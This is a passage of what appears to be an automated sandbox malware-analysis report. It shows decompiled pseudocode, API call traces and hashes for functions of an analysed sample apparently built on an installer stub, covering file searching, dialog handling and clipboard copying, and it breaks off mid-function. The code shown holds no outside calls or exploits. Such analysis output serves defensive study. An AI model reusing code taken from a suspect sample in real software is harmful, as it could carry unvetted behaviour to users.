lstrcatW.KERNEL32(?,0040A014), ref: 00405CDD
lstrlenW.KERNEL32(?,?,0040A014,?,0042F270,?,?,75B53420,C:\Users\user\AppData\Local\Temp\,00000000), ref: 00405CE3
FindFirstFileW.KERNEL32(0042F270,?,?,?,0040A014,?,0042F270,?,?,75B53420,C:\Users\user\AppData\Local\Temp\,00000000), ref: 00405CF3
FindNextFileW.KERNEL32(00000000,00000010,000000F2,?,?,?,?,0000002E), ref: 00405D93
FindClose.KERNEL32(00000000), ref: 00405DA2

Strings

\*.*, xrefs: 00405CB4
C:\Users\user\AppData\Local\Temp\, xrefs: 00405C56
., xrefs: 00405D04
., xrefs: 00405D18

Memory Dump Source

Source File: 00000014.00000002.1497469211.0000000000401000.00000020.00000001.01000000.00000009.sdmp, Offset: 00400000, based on PE: true

Associated: 00000014.00000002.1497430225.0000000000400000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000014.00000002.1497528656.0000000000408000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000014.00000002.1497563830.000000000040A000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000014.00000002.1497635882.0000000000416000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000014.00000002.1497724577.0000000000422000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000014.00000002.1497772991.000000000042C000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000014.00000002.1497812165.0000000000431000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000014.00000002.1497856729.0000000000440000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000014.00000002.1497886694.0000000000442000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000014.00000002.1497929492.000000000045F000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000014.00000002.1497975486.0000000000461000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_20_2_400000_wqs.jbxd

Similarity

API ID: FileFind$lstrcat$CloseDeleteFirstNextlstrlen
String ID: .$.$C:\Users\user\AppData\Local\Temp\$\*.*
API String ID: 2035342205-1953461807
Opcode ID: d4824498ca5d4646401654330336f54dc3516ea2401a274e156101c2699109e4
Instruction ID: 8b2ee76931e9ba666d6dc67a471f1b560bbb00ea1adf29c264b32972d7114dcf
Opcode Fuzzy Hash: d4824498ca5d4646401654330336f54dc3516ea2401a274e156101c2699109e4
Instruction Fuzzy Hash: 3D41A130900A14BADB216B65CC8DABF7678DF81714F14817FF841B21D1D77C4A819EAE

Uniqueness

Uniqueness Score: -1.00%

Function 00406873 Relevance: 3.0, APIs: 2, Instructions: 14
fileCOMMON

Download Yara Rule

C-Code - Quality: 100%

			E00406873(WCHAR* _a4) {
				void* _t2;

				_t2 = FindFirstFileW(_a4, 0x4302b8); // executed
				if(_t2 == 0xffffffff) {
					return 0;
				}
				FindClose(_t2); // executed
				return 0x4302b8;
			}

0x0040687e
0x00406887
0x00000000
0x00406894
0x0040688a
0x00000000

APIs

FindFirstFileW.KERNELBASE(75B53420,004302B8,0042FA70,00405F5D,0042FA70,0042FA70,00000000,0042FA70,0042FA70,75B53420,?,C:\Users\user\AppData\Local\Temp\,00405C69,?,75B53420,C:\Users\user\AppData\Local\Temp\), ref: 0040687E
FindClose.KERNELBASE(00000000), ref: 0040688A

Memory Dump Source

Source File: 00000014.00000002.1497469211.0000000000401000.00000020.00000001.01000000.00000009.sdmp, Offset: 00400000, based on PE: true

Associated: 00000014.00000002.1497430225.0000000000400000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000014.00000002.1497528656.0000000000408000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000014.00000002.1497563830.000000000040A000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000014.00000002.1497635882.0000000000416000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000014.00000002.1497724577.0000000000422000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000014.00000002.1497772991.000000000042C000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000014.00000002.1497812165.0000000000431000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000014.00000002.1497856729.0000000000440000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000014.00000002.1497886694.0000000000442000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000014.00000002.1497929492.000000000045F000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000014.00000002.1497975486.0000000000461000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_20_2_400000_wqs.jbxd

Similarity

API ID: Find$CloseFileFirst
String ID:
API String ID: 2295610775-0
Opcode ID: 86d0f84efe5cb21a5e65899ed37e92679b9de560e532c409a12d624e9ae3e839
Instruction ID: 67599a3b69382adcf67454a25bfea179debcebd0a6e2e92eb77ede12202c023a
Opcode Fuzzy Hash: 86d0f84efe5cb21a5e65899ed37e92679b9de560e532c409a12d624e9ae3e839
Instruction Fuzzy Hash: C3D012325192205FC3402B386E0C84B7A989F16331726CB76B4AAF51E0D7388C7387BD

Uniqueness

Uniqueness Score: -1.00%

Function 0040290B Relevance: 1.5, APIs: 1, Instructions: 30
fileCOMMON

Download Yara Rule

C-Code - Quality: 41%

			E0040290B(short __ebx, short* __edi) {
				void* _t8;
				void* _t21;

				_t8 = FindFirstFileW(E00402DA6(2), _t21 - 0x2dc); // executed
				if(_t8 != 0xffffffff) {
					E00406484( *((intOrPtr*)(_t21 - 0xc)), _t8);
					_push(_t21 - 0x2b0);
					_push(__edi);
					E0040653D();
				} else {
					 *((short*)( *((intOrPtr*)(_t21 - 0xc)))) = __ebx;
					 *__edi = __ebx;
					 *((intOrPtr*)(_t21 - 4)) = 1;
				}
				 *0x434f88 =  *0x434f88 +  *((intOrPtr*)(_t21 - 4));
				return 0;
			}

0x0040291a
0x00402923
0x0040293e
0x00402949
0x0040294a
0x00402a94
0x00402925
0x00402928
0x0040292b
0x0040292e
0x0040292e
0x00402c2d
0x00402c39

APIs

FindFirstFileW.KERNELBASE(00000000,?,00000002), ref: 0040291A

Memory Dump Source

Source File: 00000014.00000002.1497469211.0000000000401000.00000020.00000001.01000000.00000009.sdmp, Offset: 00400000, based on PE: true

Associated: 00000014.00000002.1497430225.0000000000400000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000014.00000002.1497528656.0000000000408000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000014.00000002.1497563830.000000000040A000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000014.00000002.1497635882.0000000000416000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000014.00000002.1497724577.0000000000422000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000014.00000002.1497772991.000000000042C000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000014.00000002.1497812165.0000000000431000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000014.00000002.1497856729.0000000000440000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000014.00000002.1497886694.0000000000442000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000014.00000002.1497929492.000000000045F000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000014.00000002.1497975486.0000000000461000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_20_2_400000_wqs.jbxd

Similarity

API ID: FileFindFirst
String ID:
API String ID: 1974802433-0
Opcode ID: db3e0d9fc2be9d26385cb54e60570df6e1e2b9abacb98404d6fb5f3e13457c69
Instruction ID: 3f6fbcf0fd4d311cdd608d5f72697756ed96b8559223cd5d9f1c4d92bc61f1b3
Opcode Fuzzy Hash: db3e0d9fc2be9d26385cb54e60570df6e1e2b9abacb98404d6fb5f3e13457c69
Instruction Fuzzy Hash: 3CF08271A04105EFD701DBA4ED49AAEB378FF14314F60417BE116F21D0E7B88E159B29

Uniqueness

Uniqueness Score: -1.00%

Function 004056DE Relevance: 65.0, APIs: 36, Strings: 1, Instructions: 284
windowclipboardmemoryCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

C-Code - Quality: 96%

			E004056DE(struct HWND__* _a4, long _a8, long _a12, unsigned int _a16) {
				struct HWND__* _v8;
				long _v12;
				struct tagRECT _v28;
				void* _v36;
				signed int _v40;
				int _v44;
				int _v48;
				signed int _v52;
				int _v56;
				void* _v60;
				void* _v68;
				void* __ebx;
				void* __edi;
				void* __esi;
				struct HWND__* _t94;
				long _t95;
				int _t100;
				int _t101;
				long _t104;
				void* _t108;
				intOrPtr _t119;
				void* _t127;
				intOrPtr _t130;
				struct HWND__* _t134;
				int _t156;
				int _t159;
				struct HMENU__* _t164;
				struct HWND__* _t168;
				struct HWND__* _t169;
				int _t171;
				void* _t172;
				short* _t173;
				short* _t175;
				int _t177;

				_t169 =  *0x433ee4; // 0x170250
				_t156 = 0;
				_v8 = _t169;
				if(_a8 != 0x110) {
					__eflags = _a8 - 0x405;
					if(_a8 == 0x405) {
						_t127 = CreateThread(0, 0, E00405672, GetDlgItem(_a4, 0x3ec), 0,  &_v12); // executed
						CloseHandle(_t127); // executed
					}
					__eflags = _a8 - 0x111;
					if(_a8 != 0x111) {
						L17:
						_t171 = 1;
						__eflags = _a8 - 0x404;
						if(_a8 != 0x404) {
							L25:
							__eflags = _a8 - 0x7b;
							if(_a8 != 0x7b) {
								goto L20;
							}
							_t94 = _v8;
							__eflags = _a12 - _t94;
							if(_a12 != _t94) {
								goto L20;
							}
							_t95 = SendMessageW(_t94, 0x1004, _t156, _t156);
							__eflags = _t95 - _t156;
							_a8 = _t95;
							if(_t95 <= _t156) {
								L36:
								return 0;
							}
							_t164 = CreatePopupMenu();
							AppendMenuW(_t164, _t156, _t171, E0040657A(_t156, _t164, _t171, _t156, 0xffffffe1));
							_t100 = _a16;
							__eflags = _a16 - 0xffffffff;
							_t159 = _a16 >> 0x10;
							if(_a16 == 0xffffffff) {
								GetWindowRect(_v8,  &_v28);
								_t100 = _v28.left;
								_t159 = _v28.top;
							}
							_t101 = TrackPopupMenu(_t164, 0x180, _t100, _t159, _t156, _a4, _t156);
							__eflags = _t101 - _t171;
							if(_t101 == _t171) {
								_v60 = _t156;
								_v48 = 0x42d268;
								_v44 = 0x1000;
								_a4 = _a8;
								do {
									_a4 = _a4 - 1;
									_t104 = SendMessageW(_v8, 0x1073, _a4,  &_v68);
									__eflags = _a4 - _t156;
									_t171 = _t171 + _t104 + 2;
								} while (_a4 != _t156);
								OpenClipboard(_t156);
								EmptyClipboard();
								_t108 = GlobalAlloc(0x42, _t171 + _t171);
								_a4 = _t108;
								_t172 = GlobalLock(_t108);
								do {
									_v48 = _t172;
									_t173 = _t172 + SendMessageW(_v8, 0x1073, _t156,  &_v68) * 2;
									 *_t173 = 0xd;
									_t175 = _t173 + 2;
									 *_t175 = 0xa;
									_t172 = _t175 + 2;
									_t156 = _t156 + 1;
									__eflags = _t156 - _a8;
								} while (_t156 < _a8);
								GlobalUnlock(_a4);
								SetClipboardData(0xd, _a4);
								CloseClipboard();
							}
							goto L36;
						}
						__eflags =  *0x433ecc - _t156; // 0x0
						if(__eflags == 0) {
							ShowWindow( *0x434f08, 8);
							__eflags =  *0x434f8c - _t156;
							if( *0x434f8c == _t156) {
								_t119 =  *0x42c240; // 0x71e40c
								E0040559F( *((intOrPtr*)(_t119 + 0x34)), _t156);
							}
							E00404472(_t171);
							goto L25;
						}
						 *0x42ba38 = 2;
						E00404472(0x78);
						goto L20;
					} else {
						__eflags = _a12 - 0x403;
						if(_a12 != 0x403) {
							L20:
							return E00404500(_a8, _a12, _a16);
						}
						ShowWindow( *0x433ed0, _t156);
						ShowWindow(_t169, 8);
						E004044CE(_t169);
						goto L17;
					}
				}
				_v52 = _v52 | 0xffffffff;
				_v40 = _v40 | 0xffffffff;
				_t177 = 2;
				_v60 = _t177;
				_v56 = 0;
				_v48 = 0;
				_v44 = 0;
				asm("stosd");
				asm("stosd");
				_t130 =  *0x434f10;
				_a8 =  *((intOrPtr*)(_t130 + 0x5c));
				_a12 =  *((intOrPtr*)(_t130 + 0x60));
				 *0x433ed0 = GetDlgItem(_a4, 0x403);
				 *0x433ec8 = GetDlgItem(_a4, 0x3ee);
				_t134 = GetDlgItem(_a4, 0x3f8);
				 *0x433ee4 = _t134;
				_v8 = _t134;
				E004044CE( *0x433ed0);
				 *0x433ed4 = E00404E27(4);
				 *0x433eec = 0;
				GetClientRect(_v8,  &_v28);
				_v52 = _v28.right - GetSystemMetrics(_t177);
				SendMessageW(_v8, 0x1061, 0,  &_v60); // executed
				SendMessageW(_v8, 0x1036, 0x4000, 0x4000); // executed
				if(_a8 >= 0) {
					SendMessageW(_v8, 0x1001, 0, _a8);
					SendMessageW(_v8, 0x1026, 0, _a8);
				}
				if(_a12 >= _t156) {
					SendMessageW(_v8, 0x1024, _t156, _a12);
				}
				_push( *((intOrPtr*)(_a16 + 0x30)));
				_push(0x1b);
				E00404499(_a4);
				if(( *0x434f18 & 0x00000003) != 0) {
					ShowWindow( *0x433ed0, _t156);
					if(( *0x434f18 & 0x00000002) != 0) {
						 *0x433ed0 = _t156;
					} else {
						ShowWindow(_v8, 8);
					}
					E004044CE( *0x433ec8);
				}
				_t168 = GetDlgItem(_a4, 0x3ec);
				SendMessageW(_t168, 0x401, _t156, 0x75300000);
				if(( *0x434f18 & 0x00000004) != 0) {
					SendMessageW(_t168, 0x409, _t156, _a12);
					SendMessageW(_t168, 0x2001, _t156, _a8);
				}
				goto L36;
			}

APIs

GetDlgItem.USER32(?,00000403), ref: 0040573C
GetDlgItem.USER32(?,000003EE), ref: 0040574B
GetClientRect.USER32(?,?), ref: 00405788
GetSystemMetrics.USER32(00000002), ref: 0040578F
SendMessageW.USER32(?,00001061,00000000,?), ref: 004057B0
SendMessageW.USER32(?,00001036,00004000,00004000), ref: 004057C1
SendMessageW.USER32(?,00001001,00000000,00000110), ref: 004057D4
SendMessageW.USER32(?,00001026,00000000,00000110), ref: 004057E2
SendMessageW.USER32(?,00001024,00000000,?), ref: 004057F5
ShowWindow.USER32(00000000,?,0000001B,000000FF), ref: 00405817
ShowWindow.USER32(?,00000008), ref: 0040582B
GetDlgItem.USER32(?,000003EC), ref: 0040584C
SendMessageW.USER32(00000000,00000401,00000000,75300000), ref: 0040585C
SendMessageW.USER32(00000000,00000409,00000000,?), ref: 00405875
SendMessageW.USER32(00000000,00002001,00000000,00000110), ref: 00405881
GetDlgItem.USER32(?,000003F8), ref: 0040575A

Part of subcall function 004044CE: SendMessageW.USER32(00000028,?,00000001,004042F9), ref: 004044DC

GetDlgItem.USER32(?,000003EC), ref: 0040589E
CreateThread.KERNEL32(00000000,00000000,Function_00005672,00000000), ref: 004058AC
CloseHandle.KERNELBASE(00000000), ref: 004058B3
ShowWindow.USER32(00000000), ref: 004058D7
ShowWindow.USER32(00170250,00000008), ref: 004058DC
ShowWindow.USER32(00000008), ref: 00405926
SendMessageW.USER32(?,00001004,00000000,00000000), ref: 0040595A
CreatePopupMenu.USER32 ref: 0040596B
AppendMenuW.USER32(00000000,00000000,00000001,00000000), ref: 0040597F
GetWindowRect.USER32(?,?), ref: 0040599F
TrackPopupMenu.USER32(00000000,00000180,?,?,00000000,?,00000000), ref: 004059B8
SendMessageW.USER32(?,00001073,00000000,?), ref: 004059F0
OpenClipboard.USER32(00000000), ref: 00405A00
EmptyClipboard.USER32 ref: 00405A06
GlobalAlloc.KERNEL32(00000042,00000000), ref: 00405A12
GlobalLock.KERNEL32(00000000), ref: 00405A1C
SendMessageW.USER32(?,00001073,00000000,?), ref: 00405A30
GlobalUnlock.KERNEL32(00000000), ref: 00405A50
SetClipboardData.USER32(0000000D,00000000), ref: 00405A5B
CloseClipboard.USER32 ref: 00405A61

Strings

{, xrefs: 00405944

Memory Dump Source

Source File: 00000014.00000002.1497469211.0000000000401000.00000020.00000001.01000000.00000009.sdmp, Offset: 00400000, based on PE: true

Associated: 00000014.00000002.1497430225.0000000000400000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000014.00000002.1497528656.0000000000408000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000014.00000002.1497563830.000000000040A000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000014.00000002.1497635882.0000000000416000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000014.00000002.1497724577.0000000000422000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000014.00000002.1497772991.000000000042C000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000014.00000002.1497812165.0000000000431000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000014.00000002.1497856729.0000000000440000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000014.00000002.1497886694.0000000000442000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000014.00000002.1497929492.000000000045F000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000014.00000002.1497975486.0000000000461000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_20_2_400000_wqs.jbxd

Similarity

API ID: MessageSend$Window$ItemShow$Clipboard$GlobalMenu$CloseCreatePopupRect$AllocAppendClientDataEmptyHandleLockMetricsOpenSystemThreadTrackUnlock
String ID: {
API String ID: 590372296-366298937
Opcode ID: cf68a949d625f316b0d3f906fa947f90e03d995c98a419fd8c5235590907ee73
Instruction ID: 6b97441d6f4cfe62a880681573964a63c423f2dd70b2063085686802d9cc5617
Opcode Fuzzy Hash: cf68a949d625f316b0d3f906fa947f90e03d995c98a419fd8c5235590907ee73
Instruction Fuzzy Hash: C8B169B1900608FFDB119FA0DD85AAE7B79FB44355F00803AFA41BA1A0C7755E51DF58

Uniqueness

Uniqueness Score: -1.00%

Function 00403F9A Relevance: 51.4, APIs: 34, Instructions: 357
windowstringCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

C-Code - Quality: 84%

			E00403F9A(struct HWND__* _a4, intOrPtr _a8, int _a12, long _a16) {
				struct HWND__* _v28;
				void* _v84;
				void* _v88;
				void* __ebx;
				void* __edi;
				void* __esi;
				signed int _t34;
				signed int _t36;
				signed int _t38;
				struct HWND__* _t48;
				signed int _t67;
				struct HWND__* _t73;
				signed int _t86;
				struct HWND__* _t91;
				signed int _t99;
				int _t103;
				signed int _t117;
				int _t118;
				int _t122;
				signed int _t124;
				struct HWND__* _t127;
				struct HWND__* _t128;
				int _t129;
				intOrPtr _t130;
				long _t133;
				int _t135;
				int _t136;
				void* _t137;
				void* _t146;

				_t130 = _a8;
				if(_t130 == 0x110 || _t130 == 0x408) {
					_t34 = _a12;
					_t127 = _a4;
					__eflags = _t130 - 0x110;
					 *0x42d250 = _t34;
					if(_t130 == 0x110) {
						 *0x434f08 = _t127;
						 *0x42d264 = GetDlgItem(_t127, 1);
						_t91 = GetDlgItem(_t127, 2);
						_push(0xffffffff);
						_push(0x1c);
						 *0x42b230 = _t91;
						E00404499(_t127);
						SetClassLongW(_t127, 0xfffffff2,  *0x433ee8);
						 *0x433ecc = E0040140B(4);
						_t34 = 1;
						__eflags = 1;
						 *0x42d250 = 1;
					}
					_t124 =  *0x40a368; // 0x0
					_t136 = 0;
					_t133 = (_t124 << 6) +  *0x434f20;
					__eflags = _t124;
					if(_t124 < 0) {
						L36:
						E004044E5(0x40b);
						while(1) {
							_t36 =  *0x42d250;
							 *0x40a368 =  *0x40a368 + _t36;
							_t133 = _t133 + (_t36 << 6);
							_t38 =  *0x40a368; // 0x0
							__eflags = _t38 -  *0x434f24;
							if(_t38 ==  *0x434f24) {
								E0040140B(1);
							}
							__eflags =  *0x433ecc - _t136; // 0x0
							if(__eflags != 0) {
								break;
							}
							__eflags =  *0x40a368 -  *0x434f24; // 0x0
							if(__eflags >= 0) {
								break;
							}
							_t117 =  *(_t133 + 0x14);
							E0040657A(_t117, _t127, _t133, 0x445000,  *((intOrPtr*)(_t133 + 0x24)));
							_push( *((intOrPtr*)(_t133 + 0x20)));
							_push(0xfffffc19);
							E00404499(_t127);
							_push( *((intOrPtr*)(_t133 + 0x1c)));
							_push(0xfffffc1b);
							E00404499(_t127);
							_push( *((intOrPtr*)(_t133 + 0x28)));
							_push(0xfffffc1a);
							E00404499(_t127);
							_t48 = GetDlgItem(_t127, 3);
							__eflags =  *0x434f8c - _t136;
							_v28 = _t48;
							if( *0x434f8c != _t136) {
								_t117 = _t117 & 0x0000fefd | 0x00000004;
								__eflags = _t117;
							}
							ShowWindow(_t48, _t117 & 0x00000008); // executed
							EnableWindow( *(_t137 + 0x34), _t117 & 0x00000100); // executed
							E004044BB(_t117 & 0x00000002);
							_t118 = _t117 & 0x00000004;
							EnableWindow( *0x42b230, _t118);
							__eflags = _t118 - _t136;
							if(_t118 == _t136) {
								_push(1);
							} else {
								_push(_t136);
							}
							EnableMenuItem(GetSystemMenu(_t127, _t136), 0xf060, ??);
							SendMessageW( *(_t137 + 0x3c), 0xf4, _t136, 1);
							__eflags =  *0x434f8c - _t136;
							if( *0x434f8c == _t136) {
								_push( *0x42d264);
							} else {
								SendMessageW(_t127, 0x401, 2, _t136);
								_push( *0x42b230);
							}
							E004044CE();
							E0040653D(0x42d268, E00403F7B());
							E0040657A(0x42d268, _t127, _t133,  &(0x42d268[lstrlenW(0x42d268)]),  *((intOrPtr*)(_t133 + 0x18)));
							SetWindowTextW(_t127, 0x42d268); // executed
							_push(_t136);
							_t67 = E00401389( *((intOrPtr*)(_t133 + 8)));
							__eflags = _t67;
							if(_t67 != 0) {
								continue;
							} else {
								__eflags =  *_t133 - _t136;
								if( *_t133 == _t136) {
									continue;
								}
								__eflags =  *(_t133 + 4) - 5;
								if( *(_t133 + 4) != 5) {
									DestroyWindow( *0x433ed8); // executed
									 *0x42c240 = _t133;
									__eflags =  *_t133 - _t136;
									if( *_t133 <= _t136) {
										goto L60;
									}
									_t73 = CreateDialogParamW( *0x434f00,  *_t133 +  *0x433ee0 & 0x0000ffff, _t127,  *( *(_t133 + 4) * 4 + "XF@"), _t133); // executed
									__eflags = _t73 - _t136;
									 *0x433ed8 = _t73;
									if(_t73 == _t136) {
										goto L60;
									}
									_push( *((intOrPtr*)(_t133 + 0x2c)));
									_push(6);
									E00404499(_t73);
									GetWindowRect(GetDlgItem(_t127, 0x3fa), _t137 + 0x10);
									ScreenToClient(_t127, _t137 + 0x10);
									SetWindowPos( *0x433ed8, _t136,  *(_t137 + 0x20),  *(_t137 + 0x20), _t136, _t136, 0x15);
									_push(_t136);
									E00401389( *((intOrPtr*)(_t133 + 0xc)));
									__eflags =  *0x433ecc - _t136; // 0x0
									if(__eflags != 0) {
										goto L63;
									}
									ShowWindow( *0x433ed8, 8); // executed
									E004044E5(0x405);
									goto L60;
								}
								__eflags =  *0x434f8c - _t136;
								if( *0x434f8c != _t136) {
									goto L63;
								}
								__eflags =  *0x434f80 - _t136;
								if( *0x434f80 != _t136) {
									continue;
								}
								goto L63;
							}
						}
						DestroyWindow( *0x433ed8);
						 *0x434f08 = _t136;
						EndDialog(_t127,  *0x42ba38);
						goto L60;
					} else {
						__eflags = _t34 - 1;
						if(_t34 != 1) {
							L35:
							__eflags =  *_t133 - _t136;
							if( *_t133 == _t136) {
								goto L63;
							}
							goto L36;
						}
						_push(0);
						_t86 = E00401389( *((intOrPtr*)(_t133 + 0x10)));
						__eflags = _t86;
						if(_t86 == 0) {
							goto L35;
						}
						SendMessageW( *0x433ed8, 0x40f, 0, 1);
						__eflags =  *0x433ecc - _t136; // 0x0
						return 0 | __eflags == 0x00000000;
					}
				} else {
					_t127 = _a4;
					_t136 = 0;
					if(_t130 == 0x47) {
						SetWindowPos( *0x42d248, _t127, 0, 0, 0, 0, 0x13);
					}
					_t122 = _a12;
					if(_t130 != 5) {
						L8:
						if(_t130 != 0x40d) {
							__eflags = _t130 - 0x11;
							if(_t130 != 0x11) {
								__eflags = _t130 - 0x111;
								if(_t130 != 0x111) {
									L28:
									return E00404500(_a8, _t122, _a16);
								}
								_t135 = _t122 & 0x0000ffff;
								_t128 = GetDlgItem(_t127, _t135);
								__eflags = _t128 - _t136;
								if(_t128 == _t136) {
									L15:
									__eflags = _t135 - 1;
									if(_t135 != 1) {
										__eflags = _t135 - 3;
										if(_t135 != 3) {
											_t129 = 2;
											__eflags = _t135 - _t129;
											if(_t135 != _t129) {
												L27:
												SendMessageW( *0x433ed8, 0x111, _t122, _a16);
												goto L28;
											}
											__eflags =  *0x434f8c - _t136;
											if( *0x434f8c == _t136) {
												_t99 = E0040140B(3);
												__eflags = _t99;
												if(_t99 != 0) {
													goto L28;
												}
												 *0x42ba38 = 1;
												L23:
												_push(0x78);
												L24:
												E00404472();
												goto L28;
											}
											E0040140B(_t129);
											 *0x42ba38 = _t129;
											goto L23;
										}
										__eflags =  *0x40a368 - _t136; // 0x0
										if(__eflags <= 0) {
											goto L27;
										}
										_push(0xffffffff);
										goto L24;
									}
									_push(_t135);
									goto L24;
								}
								SendMessageW(_t128, 0xf3, _t136, _t136);
								_t103 = IsWindowEnabled(_t128);
								__eflags = _t103;
								if(_t103 == 0) {
									L63:
									return 0;
								}
								goto L15;
							}
							SetWindowLongW(_t127, _t136, _t136);
							return 1;
						}
						DestroyWindow( *0x433ed8);
						 *0x433ed8 = _t122;
						L60:
						if( *0x42f268 == _t136) {
							_t146 =  *0x433ed8 - _t136; // 0xf0074
							if(_t146 != 0) {
								ShowWindow(_t127, 0xa); // executed
								 *0x42f268 = 1;
							}
						}
						goto L63;
					}
					asm("sbb eax, eax");
					ShowWindow( *0x42d248,  ~(_t122 - 1) & 0x00000005);
					if(_t122 != 2 || (GetWindowLongW(_t127, 0xfffffff0) & 0x21010000) != 0x1000000) {
						goto L28;
					} else {
						ShowWindow(_t127, 4);
						goto L8;
					}
				}
			}

APIs

SetWindowPos.USER32(?,00000000,00000000,00000000,00000000,00000013), ref: 00403FD6
ShowWindow.USER32(?), ref: 00403FF6
GetWindowLongW.USER32(?,000000F0), ref: 00404008
ShowWindow.USER32(?,00000004), ref: 00404021
DestroyWindow.USER32 ref: 00404035
SetWindowLongW.USER32(?,00000000,00000000), ref: 0040404E
GetDlgItem.USER32(?,?), ref: 0040406D
SendMessageW.USER32(00000000,000000F3,00000000,00000000), ref: 00404081
IsWindowEnabled.USER32(00000000), ref: 00404088
GetDlgItem.USER32(?,00000001), ref: 00404133
GetDlgItem.USER32(?,00000002), ref: 0040413D
SetClassLongW.USER32(?,000000F2,?), ref: 00404157
SendMessageW.USER32(0000040F,00000000,00000001,?), ref: 004041A8
GetDlgItem.USER32(?,00000003), ref: 0040424E
ShowWindow.USER32(00000000,?), ref: 0040426F
KiUserCallbackDispatcher.NTDLL(?,?), ref: 00404281
EnableWindow.USER32(?,?), ref: 0040429C
GetSystemMenu.USER32(?,00000000,0000F060,00000001), ref: 004042B2
EnableMenuItem.USER32(00000000), ref: 004042B9
SendMessageW.USER32(?,000000F4,00000000,00000001), ref: 004042D1
SendMessageW.USER32(?,00000401,00000002,00000000), ref: 004042E4
lstrlenW.KERNEL32(0042D268,?,0042D268,00000000), ref: 0040430E
SetWindowTextW.USER32(?,0042D268), ref: 00404322
ShowWindow.USER32(?,0000000A), ref: 00404456

Memory Dump Source

Source File: 00000014.00000002.1497469211.0000000000401000.00000020.00000001.01000000.00000009.sdmp, Offset: 00400000, based on PE: true

Associated: 00000014.00000002.1497430225.0000000000400000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000014.00000002.1497528656.0000000000408000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000014.00000002.1497563830.000000000040A000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000014.00000002.1497635882.0000000000416000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000014.00000002.1497724577.0000000000422000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000014.00000002.1497772991.000000000042C000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000014.00000002.1497812165.0000000000431000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000014.00000002.1497856729.0000000000440000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000014.00000002.1497886694.0000000000442000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000014.00000002.1497929492.000000000045F000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000014.00000002.1497975486.0000000000461000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_20_2_400000_wqs.jbxd

Similarity

API ID: Window$Item$MessageSendShow$Long$EnableMenu$CallbackClassDestroyDispatcherEnabledSystemTextUserlstrlen
String ID:
API String ID: 121052019-0
Opcode ID: 655396db076bddd1a804ad939a9de1a35d1e50ec2b89a3d41d0d0026322ce3ca
Instruction ID: 19e8ffe36521fda3862950d2389d84f1ef0c133ac5ff71005f69e3a94542e2f3
Opcode Fuzzy Hash: 655396db076bddd1a804ad939a9de1a35d1e50ec2b89a3d41d0d0026322ce3ca
Instruction Fuzzy Hash: DDC1A1B1A00704ABDB206F61EE49E2B3A68FB84746F15053EF741B61F1CB799841DB2D

Uniqueness

Uniqueness Score: -1.00%

Function 00403BEC Relevance: 44.0, APIs: 13, Strings: 12, Instructions: 215
stringregistryCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

C-Code - Quality: 96%

			E00403BEC(void* __eflags) {
				intOrPtr _v4;
				intOrPtr _v8;
				int _v12;
				void _v16;
				void* __ebx;
				void* __edi;
				void* __esi;
				intOrPtr* _t22;
